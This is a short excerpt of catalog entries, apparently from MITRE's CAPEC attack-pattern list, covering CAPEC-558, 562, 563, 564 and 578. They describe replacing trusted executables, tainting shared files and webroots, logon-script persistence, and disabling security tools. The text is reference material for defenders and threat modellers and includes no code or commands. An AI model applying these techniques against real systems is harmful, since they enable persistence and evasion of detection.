CAPEC-558: Replace Trusted Executable
An adversary exploits weaknesses in privilege management or access control to replace a trusted executable with a malicious version and enable the execution of malware when that trusted executable is called.
CAPEC-562: Modify Shared File
An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.
CAPEC-563: Add Malicious File to Shared Webroot
An adversaries may add malicious content to a website through the open file share and then browse to that content with a web browser to cause the server to execute the content. The malicious content will typically run under the context and permissions of the web server process, often resulting in local system or administrative privileges depending on how the web server is configured.
CAPEC-564: Run Software at Logon
Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.
CAPEC-578: Disable Security Software
An adversary exploits a weakness in access control to disable security tools so that detection does not occur. This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.